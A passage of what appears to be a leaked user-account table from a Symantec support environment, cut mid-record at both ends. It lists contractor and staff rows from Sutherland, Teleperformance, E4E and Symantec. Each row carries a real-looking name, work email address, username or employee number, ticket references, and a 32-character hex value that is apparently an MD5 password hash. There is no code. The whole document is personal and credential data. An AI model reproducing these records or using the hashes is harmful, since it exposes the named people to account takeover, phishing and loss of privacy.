ba27c5ad79e96db8b9a5c43282,R,<blank>,Sumathi_R1,Sumathi,NULL,NULL,NULL
9162-405b-9f6d-c0dc933ae63c,CRQ000000417505 SP 22 NOV 2011,000-0000,ngillio@syma
ntec.teleperformance.gr,Teleperformance,6644cbf1b0407043e13c1d539e349c2a,Gillio,
<blank>,080123,Nathalie,NULL,NULL,NULL
4d1-4453-81b3-fda5371ab48d,<blank>,<blank>,Sumithra_NS@SUTH.COM,Sutherland,885bd
797b9fe58ae69c24392b31702ce,N S,<blank>,Sumithra_NS,Sumithra,NULL,NULL,NULL
834-45de-98d6-879300b3dc47,<blank>,<blank>,Sundeep_Pillai@SUTH.COM,Sutherland,08
93e3815b0b706ba6271e9bd6217fba,Pillai,<blank>,Sundeep_Pillai,Sundeep,NULL,NULL,N
ULL
ae8-4bc8-a10d-481066ddfa1d,<blank>,<blank>,SunilChoudhury_D@SUTH.COM,Sutherland,
2d19675cc56b8f2a6c1cac778a1ac987,D,<blank>,SunilChoudhury_D,Sunil Choudhury,NULL
,NULL,NULL
8a4-4bb1-ad4b-3af241105808,<blank>,<blank>,SurajSuresh_Babu@SUTH.COM,Sutherland,
9091463f74e43f19710756887a5886a2,Babu,<blank>,SurajSuresh_Babu,Suraj,NULL,NULL,N
ULL
5d0-44fd-b71f-5dfafa2e6691,<blank>,<blank>,Surya_Sabu@SUTH.COM,Sutherland,284a79
b08eedfeee1835d2d7ac375123,Sabu,<blank>,Surya_Sabu,Surya,NULL,NULL,NULL
08a-4e09-9bfd-58319b7e1840,<blank>,<blank>,Sreetha_Sreekumar@SUTH.COM,Sutherland
,5ac7fc9436db47c7b61b59f9735a62b5,Sreekumar,<blank>,Sreetha_Sreekumar,Sreetha,NU
LL,NULL,NULL
256-47b6-b9e8-16b2763f315f,<blank>,<blank>,Srikar_Daram@SUTH.COM,Sutherland,b532
ffcaecd82b53e41509999524a959,Daram,<blank>,Srikar_Daram,Srikar,NULL,NULL,NULL
5b7-4a53-a53d-0b226bbbeef0,<blank>,<blank>,Srirakshini_TS@SUTH.COM,Sutherland,07
f049fefb92b0ca52ad08b702d483fe,T S,<blank>,Srirakshini_TS,Srirakshini,NULL,NULL,
NULL
00c-4c01-bc35-ff7a4d5a1cb0,<blank>,<blank>,Stalin_CA@SUTH.COM,Sutherland,ff8eb10
209ba9ce5dc8b674f274b49d7,C A,<blank>,Stalin_CA,Stalin,NULL,NULL,NULL
ca3-4d44-abc9-6b27af0e34dd,<blank>,<blank>,SubbaRaju_D@SUTH.COM,Sutherland,85a7d
e1e4616a840aeda340240e742ca,Raju,<blank>,SubbaRaju_D,Danthuluri,NULL,NULL,NULL
ac6-4426-a5ef-167be6a21dcb,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,459e4ade48b6152fb26b614ddad01004,J,<blank>,Sundaram_J,Sundaram,NULL,NULL,NULL
ae1-4ca9-b275-e9970d36d812,<blank>,<blank>,Suren_Salvi@SUTH.COM,Sutherland,719fd
39d09ff9df51588b9649d8a42a1,Salvi,<blank>,Suren_Salvi,Suren,NULL,NULL,NULL
ff2-461b-8cfe-91528663c70b,<blank>,<blank>,Suresh_GK@SUTH.COM,Sutherland,5683bb4
ed0a31fbc59508884b9cbbce7,G K,<blank>,Suresh_GK,Suresh,NULL,NULL,NULL
eef6-4bb3-a1d1-2236773cc721,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,72caae27aac6ba031742ef2c97bb1538,S,<blank>,surendar_s_cc,Surendar,NULL,NU
LL,NULL
1d3-43ad-a639-b6520ba12812,<blank>,2633284,tools_id@symantec.suth.com,Sutherland
,944b199e018ed2b92fa781d8c97b43e5,Shaikh,<blank>,Tasneem_Shaikh,Tasneem,NULL,NUL
L,NULL
1647-42bf-8c79-2ceed8721cc4,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,b54a8ea0d3c7537f2712979d4893832a,Ningwa,<blank>,mark_ningwa_cc,Mark,NULL,
NULL,NULL
368-410c-9b79-7799e1b95bde,<blank>,<blank>,TetchieMae_Borongan@SUTH.COM,Sutherla
nd,ae8372493c2cceae75db9e9ebe2fad20,MaeBorongan,<blank>,TetchieMae_Borongan,Tetc
hie,NULL,NULL,NULL
de6-4d9c-9156-0a79fc080333,<blank>,<blank>,Thilagam_S@SUTH.COM,Sutherland,1976a7
c599cb8599db08b96b3bbcd4f4,Selvaraj,<blank>,Thilagam_S,Thilagam,NULL,NULL,NULL
9ee-4d6d-a3e6-6290b45cd14b,<blank>,<blank>,ThineshBabu_P@SUTH.COM,Sutherland,26a
1e77488fdb56f564c0234f902a85d,P,<blank>,ThineshBabu_P,Thinesh Babu,NULL,NULL,NUL
L
9c5-46d1-a08e-e1c143256580,<blank>,<blank>,Thomas_Thekkath1@SUTH.COM,Sutherland,
e79c1f90c2ace98f1fef7ca799c717dd,Thekkath,<blank>,Thomas_Thekkath1,Thomas,NULL,N
ULL,NULL
c3d-4e88-a4d4-aaf6a60eb586,<blank>,<blank>,Stephen_Vincent@SUTH.COM,Sutherland,1
b56cdf7fb7ee9dc273178681b92ea5f,Vincent,<blank>,Stephen_Vincent,Stephen,NULL,NUL
L,NULL
f83-4ec6-8da4-499de81d64fe,<blank>,<blank>,tina_abramishuili@suth.com,Sutherland
,ccbf63bc914420f147028516b5a409a3,Abramishvili,<blank>,tina_abramishuili,Tinatin
,NULL,NULL,NULL
b3e-4f7e-b6d8-284c4b11a221,<blank>,<blank>,TirupathiRao_P@SUTH.COM,Sutherland,69
f000cccf39c8da914c35f2a9ca7c94,P,<blank>,TirupathiRao_P,Tirupathi Rao,NULL,NULL,
NULL
87c-46fe-a580-119818eecde6,<blank>,<blank>,Umaid_Shaikh@SUTH.COM,Sutherland,d22e
0921ec6f97d29f372748ac95c962,Shaikh,<blank>,Umaid_Shaikh,Umaid,NULL,NULL,NULL
b48-45c5-91de-39f1b4737cd4,<blank>,<blank>,UmaMaheswari_R@SUTH.COM,Sutherland,e1
dff06d83348aff84b9b9933602f5bb,R,<blank>,UmaMaheswari_R,Uma Maheswari,NULL,NULL,
NULL
6c3-4b7a-9b34-357ec3d01bce,<blank>,<blank>,UmaRani_G@SUTH.COM,Sutherland,a7615a5
5bb62dfbb8fcfee2da0d6fa70,G,<blank>,UmaRani_G,Uma Rani,NULL,NULL,NULL
314-4b47-889f-918506758bb4,<blank>,<blank>,UmeshChowdhary_B@SUTH.COM,Sutherland,
a652141914a49e3a76205337686dc5be,B,<blank>,UmeshChowdhary_B,Umesh Chowdhary,NULL
,NULL,NULL
8eb-4278-9649-463e20b9e72a,<blank>,<blank>,Varun_A1@SUTH.COM,Sutherland,4d13aa09
dadb942d49189c563dfb8582,A,<blank>,Varun_A1,Varun,NULL,NULL,NULL
45d-4302-9d64-08380046217b,<blank>,<blank>,Vasanth_V3@SUTH.COM,Sutherland,af1d31
5e4593e89d6702ce6581fa7a88,V,<blank>,Vasanth_V3,Vasanth,NULL,NULL,NULL
8dd-4665-b8cf-9a81637e8350,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,5e71c6b9e3618ad05e7868bbe95481da,K,<blank>,Vayapparaj_K,Vayapparaj,NULL,NULL,NU
LL
fde-4c65-8e85-e672db750ecf,<blank>,<blank>,Veena_S2@SUTH.COM,Sutherland,ce87fd60
648959925aad620e08925781,S,<blank>,Veena_S2,Veena,NULL,NULL,NULL
16e-461b-8d46-803fb100154e,<blank>,<blank>,Veeramani_A@SUTH.COM,Sutherland,c2496
72af3bdcf173dab9f126a46412f,A,<blank>,Veeramani_A,Veeramani,NULL,NULL,NULL
029-4d46-86e6-e188500c4043,<blank>,<blank>,VenkataRaviKiran_P@SUTH.COM,Sutherlan
d,f2d850a0563f95db92bf32e466fd487a,P,<blank>,VenkataRaviKiran_P,Venkata Ravi Kir
an,NULL,NULL,NULL
2c0-49c2-a999-74f1d38cff94,<blank>,<blank>,Venkateswaran_V@SUTH.COM,Sutherland,f
6d1cedb52fff2f619ade571f46db8cf,Veerapathran,<blank>,Venkateswaran_V,Venkateswar
an,NULL,NULL,NULL
fd9-4e44-a18d-0134d557aade,<blank>,<blank>,Venkatraj_E@SUTH.COM,Sutherland,63356
77034ab7cebbcc932dfd6592bb1,E,<blank>,Venkatraj_E,Venkatraj,NULL,NULL,NULL
57a-4845-9658-1b81e3160f00,<blank>,<blank>,Vijay_Mark@SUTH.COM,Sutherland,8542cd
8c0dd53655f47a59198ff69b78,Mark,<blank>,Vijay_Mark,Vijay,NULL,NULL,NULL
10a-4c30-b990-6dc4bcfdda4e,<blank>,<blank>,Sriram_R1@SUTH.COM,Sutherland,428a427
5a6cdc198e9b9e7322272d5c2,R,<blank>,Sriram_R1,Sriram,NULL,NULL,NULL
507-4a64-a9f9-ae639eb51564,<blank>,<blank>,Varikkara_Mon@SUTH.COM,Sutherland,eea
ed774a674bbece447fbfc75f8506a,Mon,<blank>,Varikkara_Mon,Varikkara,NULL,NULL,NULL
e1d0-4e70-951f-22df26f596db,BPR-14/12/09,EMPROV,tools_id@symantec.suth.com,Suthe
rland,3ed26eedf3935a319841bb6fa68ec0c7,Pandhy,<blank>,097661,Santosh,NULL,NULL,N
ULL
4abe-4339-adab-ceba141382e0,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,76f9a6f7bed6b80f4836a9c9090ad708,Joseph,<blank>,lovely_joseph_cc,Lovely ,
NULL,NULL,NULL
5c2-4635-8a59-ec2db6867ceb,<blank>,<blank>,VijayShankar_S@SUTH.COM,Sutherland,92
b92a4f60b2fdcc7b966521fd264f27,S,<blank>,VijayShankar_S,Vijay Shankar,NULL,NULL,
NULL
b3fa-4e58-9996-114a2e6c5a3e,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,6f3c68d83c3fb37dbf807ff740bf4e61,Aslayan,<blank>,anna_aslayan_cc,Anna,NUL
L,NULL,NULL
5ba-4963-8c3a-6189bb8f7954,<blank>,<blank>,ViktorVincent_Vidal@SUTH.COM,Sutherla
nd,24bbdae84d62bb8a0ac594989ea2ac8a,VincentVidal,<blank>,ViktorVincent_Vidal,Vik
tor,NULL,NULL,NULL
c52-42de-82e2-ed378379270d,<blank>,<blank>,Vimal_V2@SUTH.COM,Sutherland,1b2b6f3d
768491679faa64922d03c5a8,V,<blank>,Vimal_V2,Vimal,NULL,NULL,NULL
5676-41b2-a0b0-a7c70d8ca222,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,6346ef2c10506052c7a002d0573bb78d,MarcesJr,<blank>,larry_marcesjr_cc,Larry
Orozco ,NULL,NULL,NULL
28d-44f4-ab1d-9781ef0171df,<blank>,<blank>,VimalaDevi_S@SUTH.COM,Sutherland,f772
4aec6da0c3bf81eb4057a62d6fd0,S,<blank>,VimalaDevi_S,Vimala Devi,NULL,NULL,NULL
a11-4560-9570-b341e1a46e0e,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,53dde44295ce626e1b1af67742164e5c,B,<blank>,Vimalraj_B,Vimalraj,NULL,NULL,NULL
e7b-4672-b7a7-d3daeb21780c,<blank>,<blank>,Vineeth_Venugopal@SUTH.COM,Sutherland
,b36e56c49e71254abbc8145f7aa41313,Venugopal,<blank>,Vineeth_Venugopal,Vineeth,NU
LL,NULL,NULL
53b-4fd5-be99-109dd8a9d637,<blank>,<blank>,Sagar_Karwa@symantec.com,Symantec,3d0
8cb76f1680cf3ef03697c836bdf16,Karwa,<blank>,sagar_karwa,Sagar,NULL,NULL,NULL
5c0-473a-aee9-16542b42e06b,<blank>,<blank>,Vipin_V@SUTH.COM,Sutherland,9d0d628c7
34c761d32aef28d3f7d4750,V,<blank>,Vipin_V,Vipin,NULL,NULL,NULL
ac2-4a2f-a7f1-b1339b90ce31,<blank>,<blank>,Vishnu_V@SUTH.COM,Sutherland,fa82d4ad
cbe187c459a52240bf470543,V,<blank>,Vishnu_V,Vishnu,NULL,NULL,NULL
a87-46c4-9072-50f50c8ebec1,<blank>,<blank>,Vishwakumar_P@SUTH.COM,Sutherland,930
6f4bd5927b090e76e1ed833c96d71,P,<blank>,Vishwakumar_P,Vishwakumar,NULL,NULL,NULL
79a-4092-849a-1c2e8df3c009,<blank>,<blank>,Viswajith_VG@SUTH.COM,Sutherland,3c1d
4816d7a5c658c4b7e625bc810a1f,V G,<blank>,Viswajith_VG,Viswajith,NULL,NULL,NULL
f35a-47d8-b9d5-69227d54beca,<blank>,<blank>,kuldeep_khanijow@symantec.com,Symant
ec,91eb2a4e75f6bd1774f2e0315fbd9d31,Khanijow,<blank>,kuldeep_khanijow,Kuldeep,NU
LL,NULL,NULL
5ac-4610-9e0b-9ce8627f68ce,<blank>,<blank>,Thomas_Scotland@SUTH.COM,Sutherland,b
2a4138f5a7aed42672b362cbc1a29df,Scotland,<blank>,Thomas_Scotland,Thomas,NULL,NUL
L,NULL
c9b5-4dc3-ae6a-991bf76fd00c,sms 11.11.10,<blank>,tools_id@symantec.suth.com,suth
erland,7e138420bc7fe29cbd302526468370f7,DeviK,<blank>,110545,Lalitha,NULL,NULL,N
ULL
c5d8-4927-9aec-cb51e0e6d63b,sms 11.11.10,<blank>,tools_id@symantec.suth.com,suth
erland,972d65f6456daf5daa11c3bba36f1877,Paturi,<blank>,110549,Pradeep,NULL,NULL,
NULL
3ae-4cab-86da-9fd50d9ab46e,<blank>,<blank>,v-6trw@mssupport.microsoft.com,Suther
land,bf5ee9a7968392b8252106f244267843,Weist,<blank>,Trina_Weist,Trina,NULL,NULL,
NULL
bc7-4ce9-9b28-9d764168b436,<blank>,<blank>,Tyra_Duggan@SUTH.com,Sutherland,e7c78
0c262ce635db7300bab46184961,Duggan,<blank>,Tyra_Duggan,Tyra,NULL,NULL,NULL
16c-46fa-92ca-f19a6601df3d,<blank>,074421,Tools_id@symantec.suth.com,Sutherland,
086e74731557e41e675d3a55bfb1fc10,U,<blank>,UdhayaKumar_U,Udhaya Kumar,NULL,NULL,
NULL
873-4b2b-8f74-2299f1c4abdb,<blank>,<blank>,UhoanaEthil_Montealto@SUTH.COM,Suther
land,c45210f01a4bb6b2ae141733aa8869f6,EthilMontealto,<blank>,UhoanaEthil_Monteal
to,Uhoana,NULL,NULL,NULL
89d-4660-90b7-8b82cbd7face,<blank>,<blank>,Umadevi_M@SUTH.COM,Sutherland,26988de
30c12902e83717f549e73bb70,Mayilsamy,<blank>,Umadevi_M,Umadevi,NULL,NULL,NULL
5d8-42b5-933b-0cefd8b30c2e,WS 19-07-2010,INC213497,Venkatesh_Ranglal2@SUTH.COM,S
utherland,ba39ac3e35e278e1cc4997195d7d8e9d,Rangalal,<blank>,Venkatesh_Ranglal2,V
enkatesh,NULL,NULL,NULL
2a5-4b9d-8998-76808ad62d74,<blank>,<blank>,Vijaitha_Nair@SUTH.COM,Sutherland,4d5
ee45fbb0904d71739ecc000b35c2c,Nair,<blank>,Vijaitha_Nair,Vijaitha,NULL,NULL,NULL
5f17-490f-9c62-13235ee0880b,SSS 03/12/09,EMPROV\\INC 63679,symantec_2nd_maa@tp-t
ec.nl,TPH,be93df68b1bf1470a1af505669f62c87,Steijns,<blank>,096391,Tom,NULL,NULL,
NULL
033-4f65-a9c8-b3b88f411f4c,<blank>,<blank>,Vijin_J@SUTH.COM,Sutherland,2846149b1
a0f10648256ad5f983401aa,J,<blank>,Vijin_J,Vijin,NULL,NULL,NULL
ea34-4e7d-a97e-5ec779d7d6f5,<blank>,<blank>,tools_id@symantec.suth.com,4th Jan 2
012 - PR - CRQ000000486492,ac3b3921b098db710337415f8f1798df,Michael,<blank>,1236
17,Kevin,NULL,NULL,NULL
a836-4579-a71f-5b5ddf53131c,SRB 24.08.2010,INC000000249136,tools_id@symantec.sut
h.com,Sutherland,6905fabbc37589a9db5b3335207d4768,Uppati,<blank>,100644,Rajesh K
umar,NULL,NULL,NULL
d23-409e-96e6-f3531d6d80d8,<blank>,090604/2633251,Tools_id@symantec.suth.com,Sym
antec,049827aafe57b3cc7714db309271d3d3,Ayre,<blank>,sachin_ayre,Sachin,NULL,NULL
,NULL
f18-4a65-955f-59cb38a7597c,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,bdd87b7b781145d8a4650e14267e3f0d,P,<blank>,Vipina_P,Vipina,NULL,NULL,NULL
3a32-46aa-ae02-9d9760051d20,<blank>,<blank>,tools_id@symantec.suth.com,11th Jan
2012 - PR - CRQ000000496504,45e4ef4910f153dfacae462cb791863f,Alfelor,<blank>,123
850,Joshua,NULL,NULL,NULL
5dee-47d0-a651-9479c8c211f6,CRQ000000515613 SP JAN 2012,000-0000,shaikmehaboob_j
ani@symantec.suth.com,Sutherland,06de51c66fc5aa88a84dcd0dc7cc5965,Jani,<blank>,1
24158,Shaik Mehaboob,NULL,NULL,NULL
4f6d-4ab7-82f8-eb092f2dc73d,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518139,1e2da114676d82def5d9369503f913b8,Satiada,<blank>,124175,Ro
chelleValerie ,NULL,NULL,NULL
4cc-4e9a-837c-deb255b00801,<blank>,<blank>,ZarithAprilCabuga_Quinones@SUTH.COM,S
utherland,ad38c3f42474503050eb18ed49c1e27f,CabugaQui\xf1ones,<blank>,ZarithApril
Cabuga_Quinones,ZarithApril,NULL,NULL,NULL
f609-41e9-96c0-41c626c9c75e,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518345,94272e906686cf9f5bada94c5ae8236a,Venezuela,<blank>,124176,
Chevy ,NULL,NULL,NULL
f08-463c-9150-abe34e579e8e,<blank>,<blank>,Zulfiquar_Shaikh@SUTH.COM,Sutherland,
90bd03162d922fa150f13f1085639bcc,Shaikh,<blank>,Zulfiquar_Shaikh,Zulfiquar,NULL,
NULL,NULL
4b30-45f8-8e82-496def59fc1f,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518155,40641c278a3aa71f5622f91f37f4c81e,Zaide,<blank>,124179,Mich
ael ,NULL,NULL,NULL
7469-4fa7-907f-5cc7b6b21bba,<blank>,<blank>,celvva_vetrivelu@symantec.com,Symant
ec,a146f1acbb398a27adab25913c49d8eb,Vetrivelu,<blank>,celvva_vetrivelu,Celvva,NU
LL,NULL,NULL
886d-4801-89cb-380be3fa780f,SRB 26.08.2010,INC000000251165,nh.symantec@teleperfo
rmance.com.ar,Teleperformance,88a0e60d1b3a3b109959c8a8b86f3ef8,Stivala,<blank>,0
92059,Victor,NULL,NULL,NULL
078-4dc5-9a5c-f584e38b066c,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,c77e7865bfd84b6216062464abf8d47a,Alvaro Saenz Martinez,<blank>,Jose_AlvaroSaenz
Martinez,Jose,NULL,NULL,NULL
d3a-4159-8b6e-393d63f7bdca,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,c0b5d2c41aee9a967f86641da2255c4d,Mauricio Siliceo Montemayor,<blank>,Rene_Mauri
cioSiliceoMontemayor,Rene,NULL,NULL,NULL
a23-4d4a-8317-4dd538d5e8d0,<blank>,<blank>,patrick_schultz@symantec.com,Symantec
,1a4ccfd38a6624b28c70e21288ec03c5,Schultz,<blank>,patrick_schultz,Patrick,NULL,N
ULL,NULL
15a-494d-8a79-886e57f366a7,<blank>,<blank>,manjunatha.t@symantec.ts.e4e.com,E4E,
69627a730fd71ff332d2d6d83b0a71f1,Thippareddy,<blank>,Manjunatha_Thippareddy,Manj
unatha,NULL,NULL,NULL
802-4b2a-9eb5-9fc057b5df04,<blank>,<blank>,khondram.rakesh@symantects.chnts.e4e.
com,E4E,695c4bec8b995a5f6b96ea7c123fd09c,Rakesh,<blank>,Khondram_Rakesh,Khondram
,NULL,NULL,NULL
42c-4f80-8247-00a206bc8a7a,<blank>,<blank>,madhan.kumarp@symantects.chnts.e4e.co
m,E4E,bc051d550e5605ed4415ac05950c5359,Kumarp,<blank>,Madhan_Kumarp,Madhan,NULL,
NULL,NULL
b48-49c5-a128-cf2d47747d88,<blank>,<blank>,sinchu.haneefa@symantects.chnts.e4e.c
om,E4E,fe1191549b7583001854f8067f75e043,Haneefa,<blank>,Sinchu_Haneefa,Sinchu,NU
LL,NULL,NULL
ab9-43ec-9978-872da1a98982,<blank>,<blank>,padameshwar.nabachan@symantects.chnts
.e4e.com,E4E,e8683680e4c2b8b6605494a2d19b533e,Nabachan,<blank>,Padameshwar_Nabac
han,Padameshwar,NULL,NULL,NULL
fd2-4013-a51b-2c4dee0c7fe8,<blank>,<blank>,inesh.gopinathan@symantects.chnts.e4e
.com,E4E,a80ca7ba275d4ef39dd4918fd83d2324,Gopinathan,<blank>,Inesh_Gopinathan,In
esh,NULL,NULL,NULL
b39-493b-b101-10141f0e2771,<blank>,<blank>,john.bosco@symantects.chnts.e4e.com,E
4E,b8938bf207921ec92dec98b743d1d850,Bosco,<blank>,John_Bosco,John,NULL,NULL,NULL
3e2-4143-a6b6-764ce68bb5e2,<blank>,<blank>,srikanth.tummala@symantects.chnts.e4e
.com,E4E,4b92a5a32b0d0a4aeecf0dfc7ae034ed,Tummala,<blank>,Srikanth_Tummala,Srika
nth,NULL,NULL,NULL
ead-4aca-ad5b-d1e0097aa61b,<blank>,<blank>,mohammed.sadiq@symantects.chnts.e4e.c
om,E4E,621c82343d9c5993b524c6f437a05d60,Sadiq,<blank>,Mohammed_Sadiq,Mohammed,NU
LL,NULL,NULL
00f-45cb-9415-829b10a611e8,<blank>,<blank>,gautham.kumar@symantects.chnts.e4e.co
m,E4E,a55092636e644af82c1d337a374c692c,Kumar,<blank>,Gautham_Kumar,Gautham,NULL,
NULL,NULL
3894-4405-a60d-f19dce1cb2ff,CRQ000000228088,<blank>,tools_id@symantec.suth.com,K
SC-03/28/2011,38118ef93a4785f112ffad21012215e8,Sorroche Toribio,<blank>,114281,M
artin,NULL,NULL,NULL
932-4bba-a800-dc6718328eb7,<blank>,<blank>,William_Seifried@symantec.SUTH.COM,Su
therland,2941102d777180a9de14065740ec5bb9,Seifried,<blank>,William_Seifried,Will
iam,NULL,NULL,NULL
ff8-45f1-a436-3ae4d3bb5fb1,<blank>,<blank>,Yeshwanth_Krishna@Suth.Com,Sutherland
,8803f8b8a0d0fd2a1b7d5a687cc80257,Krishna,<blank>,Yeshwanth_Krishna,Bhuvanigiri
Yashwanth,NULL,NULL,NULL
8b72-4249-8450-e917d995a7be,CRQ000000228849-KD-29-03-2011,000-000,tools_id@syman
tec.suth.com,Sutherland,25c98c9f60308dd80a657a5eff5a14f3,Shaikh,<blank>,087489,M
uzammil M,NULL,NULL,NULL
785-4db8-9962-acf567a2556e,<blank>,<blank>,YogeshRajKumar_R@SUTH.COM,Sutherland,
e2b1494c568b75ae6b39666cd0682367,R,<blank>,YogeshRajKumar_R,Yogesh Raj Kumar,NUL
L,NULL,NULL
290-47bd-967d-06e2fa433731,<blank>,<blank>,ZosetteSocorro_Ortiz@SUTH.COM,Sutherl
and,55b97c5628e8713ff7dbea66246051ee,SocorroOrtiz,<blank>,ZosetteSocorro_Ortiz,Z
osette,NULL,NULL,NULL
09b-4362-a836-e7fdf2c74df6,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,1113474856d27790021a70d5dc9a8d9c,Garza Garza,<blank>,Adrian_GarzaGarza,Adrian,N
ULL,NULL,NULL
8a5-4370-b5a4-8e9b856e201f,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,2d732dce4b2b442c8ca94a910656dde9,Ernesto Gloria Trevino,<blank>,Artemio_Ernesto
GloriaTrevino,Artemio,NULL,NULL,NULL
df8-41d9-8363-81353ffde552,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,9db7a7d3b68b69f23d9e6dba5e4353e6,Amador Aguilar Lozano,<blank>,Francisco_Amador
AguilarLozano,Francisco,NULL,NULL,NULL
afe-49bd-9c9c-bc7a1c235fb7,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,495c9b3e24ebf5debcf9fc4c9c758796,Guadalupe Salazar Monasterio,<blank>,Gabriel_G
uadalupeSalazarMonasterio,Gabriel,NULL,NULL,NULL
33f-477e-b739-6d660d2988a3,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,50f2c4f987e557d79ba426e9cfc626b2,Gerardo Hinojosa Aguirre,<blank>,Joel_GerardoH
inojosaAguirre,Joel,NULL,NULL,NULL
b470-4245-b427-6ddee1944861,CRQ000000229420,<blank>,tools_id@symantec.suth.com,K
SC-03/30/2011,748485c73393ad879088e4cf0883704e,Amutan,<blank>,097963,DarwinEspir
itu,NULL,NULL,NULL
83e-4ab4-b546-ab9b155eab54,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,b6c6cff306727a4e06f417f713aa6baa,Otoniel Garza Tapia,<blank>,Neftali_OtonielGar
zaTapia,Neftali,NULL,NULL,NULL
b91-499f-b273-1891d3b07e49,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,94698b507ce6b76c649062cf407da63e,Del Rocio Velez,<blank>,Maria_DelRocioVelez,Ma
ria,NULL,NULL,NULL
e1d-479c-b644-56dd90c75950,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,7b8f26395a8a0beabf31fb85e4de4440,Rodriguez Reyna,<blank>,Elvia_RodriguezReyna,E
lvia,NULL,NULL,NULL
4e3-4e6d-b3ce-774c7ceec298,WS 16-07-2010,INC213497,William_Moore@SUTH.COM,Suther
land,07a32f4c3ad12d22191468cffc491eef,Moore,<blank>,William_Moore,William,NULL,N
ULL,NULL
749-4cac-a965-a82cf6f3a753,<blank>,<blank>,WilliamJames_F@SUTH.COM,Sutherland,1f
0bcf2324025b9f4ea9982c7538a89a,Francis,<blank>,WilliamJames_F,William James,NULL
,NULL,NULL
377-4996-9efb-7edb265c163a,<blank>,<blank>,Winmary_Flores@SUTH.COM,Sutherland,89
2e35449afbd6b43df24c1885d9f1f1,Flores,<blank>,Winmary_Flores,Winmary,NULL,NULL,N
ULL
fbef-40c1-b17a-9d14fb0b3110,<blank>,<blank>,Arun_Narasimhan_R@symantec.com,<blan
k>,8b11c45eb85dbd7ea1fac14188a0e335,Narasimhan R,<blank>,111790,Arun,NULL,NULL,N
ULL
10f7-4ce3-8d51-e9e50eea9b20,<blank>,EMPROV,Chandra_Rangan@Symantec.com,Symantec,
666df4d6eb66ea1256f6daf019fccc3f,Rangan,<blank>,096096,Chandra,NULL,NULL,NULL
465-4e42-a52d-53a0d227fc61,<blank>,082942,accounts@symantec.teleperformance.gr,T
PG,187b8468ab797ea14798d13523f03799,Ritsina,<blank>,maria_ritsina,Maria,NULL,NUL
L,NULL
3fba-4a0f-a00b-f0fe9975beff,<blank>,<blank>,Bennet_Prabhu@symantec.com,<blank>,8
fe89ffaaf5d340b722bd6a466055594,Prabhu,<blank>,111793,Bennet,NULL,NULL,NULL
c6fa-4862-93b2-faf319b4de07,<blank>,<blank>,Dilip_R@symantec.com,<blank>,badabba
ea31b2ee6fbb65cda613c1ba5,R,<blank>,111798,Dilip,NULL,NULL,NULL
329-44f1-b861-d729fda9298f,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,76d4e363df07b18493a0f3ad0b219c49,Enrique Rosales Campos,<blank>,Mario_EnriqueRo
salesCampos,Mario,NULL,NULL,NULL
aaa8-4cf6-b7a9-2430ef56da70,CRQ000000671116--vmd--23/05/2012,<blank>,darren_somb
illo@suth.com,sutherland,0b1cdd435d1bf224db9cf5bb9cf192cb,Sombillo,<blank>,22593
5,Darren,NULL,NULL,NULL
2abf-47c3-a340-a0b3b0336353,sms 29,EMPROV,tools_id@symantec.suth.com,Sutherland,
85b8411c5c81c6d8c54243c2ffda6813,CM,<blank>,088432,Renjith,NULL,NULL,NULL
a8c-46f4-8735-8c156bb1566c,<blank>,<blank>,anubhaw.arunraj@symantec.ts.e4e.com,E
4E,06a923db97156dff1287754420edbc7f,arunraj,<blank>,Anubhaw_Arunraj,anubhaw,NULL
,NULL,NULL
2da-4ef5-81fc-261bbfb5ca37,<blank>,<blank>,nabeel.perithiyott@symantec.ts.e4e.co
m,E4E,104b33375492bc904353931f8d2d5100,Perithiyott,<blank>,Nabeel_Perithiyott,Na
beel,NULL,NULL,NULL
eca-4d8f-9738-db1db3af17c1,<blank>,<blank>,sabyasachi.dhar@symantec.ts.e4e.com,E
4E,a94fc37e1bff32f6c7a000bd7ab402fb,Dhar,<blank>,Sabyasachi_Dhar,Sabyasachi,NULL
,NULL,NULL
6dd-450f-a4ef-108e483e41f6,<blank>,<blank>,sanjeev.singh@symantec.ts.e4e.com,E4E
,42b773f8ec78252c2b7c8f7c16a9e964,singh,<blank>,Sanjeev_singh,Sanjeev,NULL,NULL,
NULL
9ce-4957-aaaa-ed5eafca085b,<blank>,<blank>,naveen.kumarg@symantects.chnts.e4e.co
m,E4E,03b38a47aaebf6f14c430c12a266a7f0,Kumarg,<blank>,Naveen_Kumarg,Naveen,NULL,
NULL,NULL
c36a-4fe4-9743-4352b11b3b03,CRQ000000515602 SP 20 JAN 2012,000-0000,ramnaresh_su
nchu1@symantec.suth.com,Sutherland,c452de6ca1c9dfa385272d0c12cef9cc,Sunchu,<blan
k>,124155,Ram Naresh,NULL,NULL,NULL
ef69-469d-9cdd-3bac40d82602,<blank>,EMPROV,tools_id@symantec.suth.com,<blank>,f7
b11fbdf312a56995d63d4306aaf108,Navaraj,<blank>,089100,Santharajan,NULL,NULL,NULL
fae-4cdc-8db9-5dbb1c5620cf,<blank>,<blank>,suresh.kumark@symantects.chnts.e4e.co
m,E4E,2f1fa632e44b0700053900ad80f6395d,Kumark,<blank>,Suresh_Kumark,Suresh,NULL,
NULL,NULL
e49a-4952-b70a-6a052ab3e68e,3-2-2011-KD,<blank>,tools_id@symantec.suth.com,Suthe
